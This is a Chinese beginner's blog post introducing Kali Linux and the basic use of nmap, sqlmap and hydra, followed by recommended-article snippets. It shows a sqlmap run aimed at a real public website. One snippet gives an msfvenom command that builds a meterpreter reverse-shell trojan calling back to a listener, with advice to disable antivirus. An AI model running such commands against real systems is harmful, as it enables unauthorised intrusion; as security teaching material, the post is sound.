【学网络安全】kali linux入门及常用简单工具介绍(附工具包)

最新推荐文章于 2024-09-03 15:07:59 发布
最新推荐文章于 2024-09-03 15:07:59 发布
阅读量1k 收藏 8
点赞数 8
文章标签: web安全 linux 安全 网络安全 学习 php sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57514792/article/details/135966993
版权

前言

相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍

一、kali linux是什么?
Kali Linux 是专门用于渗透测试的Linux操作系统,它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。没错,kali的本质也是linux系统,就好比以前的黑客经常使用一些工具,久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali,主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦
在这里插入图片描述
二、安装下载kali
kali的官网地址:https://www.kali.org

目前kali仍然在保持着更新,目前最新的kali系统为kali purple,里面继承了更多的防守方使用的工具。

下载解压后用vm打开即可,默认root账号密码均为kali,kali。没有用过VMware的同学可以先到网上学习如何下载vm。另外新手可能会遇到虚拟机没有网络的问题,新手我这里推荐配置网卡时选择直接连接,等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。(左上角虚拟机,设置,网络适配器,桥接模式,复制物理网络连接状态)

三、kali常见工具介绍
在这里插入图片描述
正如刚才所说,kali里集成了大量的黑客工具和网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。

下面我推荐几个新手入门可以用到的小工具。

(学习内容和工具包都有整理哦)

在这里插入图片描述

1.nmap
nmap被称为诸神之眼,是一款非常强大的网络探测工具,可以实现主机发现和端口扫描,同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描

nmap最基础用法:

nmap [目的ip]
nmap 192.168.1.10

nmap [目的网段]
nmap 192.168.1.0/24

map也提供了大量的扫描时候可以设置的参数,下面将举例常用的参数:

在这里插入图片描述
2.sqlmap
sqlmap是针对sql注入漏洞的一款自动化sql注入探测工具,支持多种操作系统环境和多种数据库的漏洞探测,渗透测试人员常常调侃“没有什么操作技术,就是sqlmap一把梭哈,屏幕显示绿了就直接下班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

大家尽量不要在未授权的情况下去对公网资产进行批量扫描,小心去踩缝纫机哦

3.hydra
hydra又称九头蛇,是一款非常高效的多种协议都可以使用的爆破工具,对指定ip的指定服务进行爆破,需要输入爆破使用的字典或者自己指定爆破使用的数据(比如在已知账号为admin时爆破密码)

在kali中hydra有图形化和命令行两种使用方式
在这里插入图片描述
对于新手来说,图形化界面更加简易好用,下面介绍图形化使用
在这里插入图片描述
工具种类很多,篇幅有限就不一一介绍了哦

总结

本文简单介绍了kali系统,只是适合对没有了解过的新手小白的一个引导。

如果你还想了解更多网络安全/黑客技术的内容,我这里也整理了一批资料
请添加图片描述

程序员-老K
关注
kali linux入门常用简单工具介绍
2301_77815877的博客
05-10 1万+
相信很多同了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初者用kali能做些什么,我将在本文中做简单介绍正如刚才所说,kali里集成了大量的黑客工具网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马(2)
m0_54903333的博客
04-29 420
输入命令:msfconsole输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常运行时间的任务。 NMAP使用原始IP包以新颖的方式来确定哪些主机是在网络上可用,这些主机正在提供什么样的服务(应用程序的名称和版本),什么操作系统(和OS版本),它们都在运行,什么类型的分组过滤器/防火墙在使用中,和许多其他特性。它的目的是快速扫描大型网络,但能正常工作对单个主机。 Nmap的运行在所有主要计算机操作系统,和官方的二进制软件包可用于Linux,Windows和Mac OS X的除了经典的命令行Nmap的可执行文件,nmap的套件包括一个先进的GUI和结果浏览器(Zenmap)一种灵活的数据传送,重定向和调试工具(NCAT),用于比较扫描结果(Ndiff)的实用程序,并且一个分组产生和响应分析工具(Nping)。 Nmap的被评为“年度安全产品”,由Linux杂志,信息世界,LinuxQuestions.Org和Codetalker摘要。有人甚至功能十二电影,包括重装上阵,虎胆龙威4,女孩龙纹身,和谍影重重。 Nmap是比较合适? 灵活:支持数十台先进的技术映射出网络充满了IP过滤,防火墙,路由器和其他障碍。这包括许多端口扫描机制(包括TCP和UDP),操作系统检测,版本检测,ping扫描,等等。请参阅文档页面。 功能强大:Nmap的已被用来扫描字面上机数十万庞大的网络。 便携性:大多数操作系统都支持,包括Linux,微软的Windows,FreeBSD下,OpenBSD系统,Solaris和IRIX,Mac OS X中,HP-UX,NetBSD的,SUN OS,Amiga的,等等。 很简单:虽然Nmap的提供了一套丰富的先进功能的电力用户,你可以开始作为简称为“NMAP -v -A targethost”。这两种传统的命令行和图形(GUI)版本可供选择,以满足您的喜好。二进制文件是为那些谁不希望从源代码编译的Nmap。 免费:在Nmap的项目的主要目标是帮助使互联网更安全一点,并为管理员提供/审计/黑客探索他们的网络的先进工具。 NMAP是可以免费下载,并且还配备了完整的源代码,你可以修改,并根据许可协议的条款重新分发。 有据可查:重大努力已投入全面和最新的手册页,白皮书,教程,甚至一整本书!发现他们在这里多国语言。 支持:虽然Nmap的同时没有担保,这是深受开发者和用户一个充满活力的社区提供支持。大多数这种相互作用发生在Nmap的邮件列表。大多数的bug报告和问题应该发送到NMAP-dev邮件列表,但你读的指引之后。我们建议所有用户订阅低流量的nmap-黑客公布名单。您还可以找到的Nmap在Facebook和Twitter。对于即时聊天,加入Freenode上或连接到efnet的#nmap通道。 好评:Nmap的赢得了无数奖项,包括“信息安全产品奖”,由Linux杂志,信息世界和Codetalker文摘。它已被刊登在数以百计的杂志文章,几部电影,几十本书,一本漫画书系列。访问进一步的细节新闻页面。 热门:成千上万的人下载Nmap的每一天,它包含许多操作系统(红帽Linux,Debian的Linux中,Gentoo的,FreeBSD下,OpenBSD的,等等)。它是在Freshmeat.Net库的前十名(总分30000)方案之间。这是很重要的,因为它的Nmap借给其充满活力的发展和用户的支持群体。
教程】2024年10款渗透测试人员必备工具Kali Linux+Nmap+Metasploit
2401_84790759的博客
05-10 1331
WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。本文主要内容包括:1、Wireshark软件下载和安装以及Wireshark主界面介绍。2、WireShark简单抓包示例。通过该例子会怎么抓包以及如何简单查看分析数据包内容。3、Wireshark过滤器使用。通过过滤器可以筛选出想要分析的内容。包括按照协议过滤、端口和主机名过滤、数据包内容过滤。
2024最新版kali安装教程_kali下载
最新发布
2401_86454660的博客
09-03 4159
因为处理器配置参数在后面使用过程中是可以随时修改的,所以这里简单设置一下即可:设置 “处理器数量”为:2,“每个处理器的内核数量”为:2,点击 “下一步”。点击右侧 “浏览” ,选择安装位置,虚拟机文件 “位置” 别放C盘就行,路径、文件名按照自己喜好来设置,可以设置成中文;5、操作系统选择 “Linux” ,版本选择 “Debian 64位” ,至于选择64位还是32位需要根据镜像选择对应的版本,当然也可以直接选择64位,毕竟可以向下兼容。11、密码根据自身喜好设置,设置完后,点击 “继续”。
kali Linux安全工具集合(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
05-31 1255
❝在Linux安全领域,无论是防守还是进攻,都有一系列强大的工具可以帮助专业人士保护他们的系统或评估潜在的安全漏洞。今天,我们将介绍一些顶级的Linux安全工具,这些工具被广泛用于各种安全任务,包括侦察、漏洞扫描、网络攻击、密码破解、移动安全、逆向工程、利用、无线攻击、社会工程、网络应用渗透测试、后渗透以及报告与文档。❞。
kali工具中文手册pdf_PDF Squeezer 4.0.1 for Mac 中文版 PDF文件压缩工具
weixin_39924198的博客
11-22 591
PDF 压缩器可以缩减大 PDF 文档的文件大小。应用程序通过移除不相干的信息和压缩图像的方式来缩减大 PDF 文件的大小。可以帮助您节省带宽费用、数字存储费用以及网络传输时间。功能特性▪ 轻轻松松将 PDF 文件拖拽至应用程序窗口或图标即可▪ 选择预设滤器,亦可以创建自定义滤器▪ 批量压缩多个文件▪ 支持受密码保护的 PDF 文件▪ ‘一键压缩’自动压缩并存储版本介绍版本4.0.1说明...
kali中文指南.pdf
01-24
该文档适合新手和英文不是很好的用户,主要文档内容为kali常用工具中文使用说明。
网络安全】-kali基本工具
2303_79055586的博客
04-27 505
图中是windows,此外,还能直接修改为linux、OSX的后门软件。,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。对于从来没有接触过网络安全的同,我们帮你准备了详细的学习成长路线图。可以说是最科最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同,我们帮你准备了详细的。,大家跟着这个大的方向学习准没问题。
KaliLinux安全渗透教程(完整版)
04-26
7.3 使用社会工程工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 ...
网络安全kali渗透学习 web渗透入门 使用WireShark对常用协议抓包
xueshenlaila的博客
02-17 1391
协议分析的时候我们关闭混淆模式,避免一些干扰的数据包存在。 这篇文章教大家如何使用WireShark对常用协议抓包并分析原理 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通!_哔哩哔哩_bilibili 文字版↓: 年底了号主把我自己用到所有技术“做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱! 常用协议分析-ARP协议
kali-linux工具包官方使用教程
03-06
kali-linux工具包官方使用教程,kali各个工具的使用教程
kali工具nping中文,文档
qq_68672649的博客
08-29 454
g, --source-port : 尝试使用自定义源端口。--icmp-advert-lifetime : 设置路由器广告生存时间。--icmp-advert-entry : 添加路由器广告条目。-g, --source-port : 设置源端口。-g, --source-port : 设置源端口。--icmp-trans-time : 设置传输时间戳。
kali ip查询_树莓派入坑之kali基本配置
weixin_39805851的博客
10-25 287
0x00 前言之前一直想打造一款移动HACK工作站,由于工作原因一直没能实现,终于在前几天,在TB上买了块树莓派4b的开发板,由于第一次入坑树莓派,折腾过程中遇到一些问题,经过各种查询,最终完美解决,所以这里分享给大家,希望能让像我这样的萌新少走弯路。配置:乌金甲 双风扇 闪迪64G 4GRAM 很霸气有木有0x01安装Kali由于小编想后期做个HACK移动工作站,所以这里选择kali...
Kali 实用手册
weixin_47649806的博客
02-18 4777
0x00 切换apt源 首先呢,源的更换在于使用的方式,在无法科上网的情况下,老老实实的使用国内源,也是very good! su root # 切换root用户 vim /etc/apt/sources.list # 配置文件 # 注释掉官方的源 # kali官方源 deb http://http.kali.org/kali kali-rolling main non-free contrib # 中科大 deb http://mirrors.ustc.edu.cn/kali kali-rol
Kalikali主要工具使用说明(文末超全思维导图)
m0_59598029的博客
01-30 3649
changeme -a 目标探测目标是否使用默认密码(新版本中已移除该工具)强大之处在于提供了大量的渗透测试模块和插件。7种类型,Exploits(渗透攻击模块)、Auxiliary(辅助模块)、Post(后渗透攻击模块)、Payloads(攻击载荷模块)、Encoders(编码器模块)、Nops(空指令模块)、Evasion(规避模块)。
Kali Linux安装使用教程 Kali安装、汉化、界面和工具介绍等,全网最详细的保姆教程!
QXXXD的博客
06-08 1187
Kali Linux渗透测试保姆教程
kali社会工程工具包基本使用
sherlockmj的博客
07-31 2383
social-engineer toolkit 输入setoolkit进入软件 1)社会工程攻击 2)快速跟踪渗透测试 3)第三方模块 4)更新社会工程工具包 5)更新set设置 6)帮助作者关于 99)退出 试一下社会工程攻击 1) 鱼叉式网络钓鱼攻击载体 2) 网站攻击载体 3) 感染性介质发生器 4) 创建有效负载和侦听器 5) 群发邮件攻击 6) 基于Arduino的攻击向量 7) 无线接入点攻击向量 8) QRCode生成器攻击向量 9) Powersh
Kali-linux使用社会工程工具包(SET)
2301_77162959的博客
05-19 1072
社会工程工具包(SET)是一个开源的、Python驱动的社会工程渗透测试工具。这套工具包由David Kenned设计,而且已经成为业界部署实施社会工程攻击的标准。SET利用人们的好奇心、信任、贪婪及一些愚蠢的错误,攻击人们自身存在的弱点。使用SET可以传递攻击载荷到目标系统,收集目标系统数据,创建持久后门,进行中间人攻击等。本节将介绍社会工程工具包的使用。
Kali Linux新手入门:配置与工具
以上仅是Kali Linux基础配置的一部分,Kali Linux作为一个渗透测试和安全审计的操作系统,还包含了众多的安全工具和框架,如Wireshark(网络封包分析软件)、Metasploit(渗透测试框架)等,这些工具的配置和使用也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值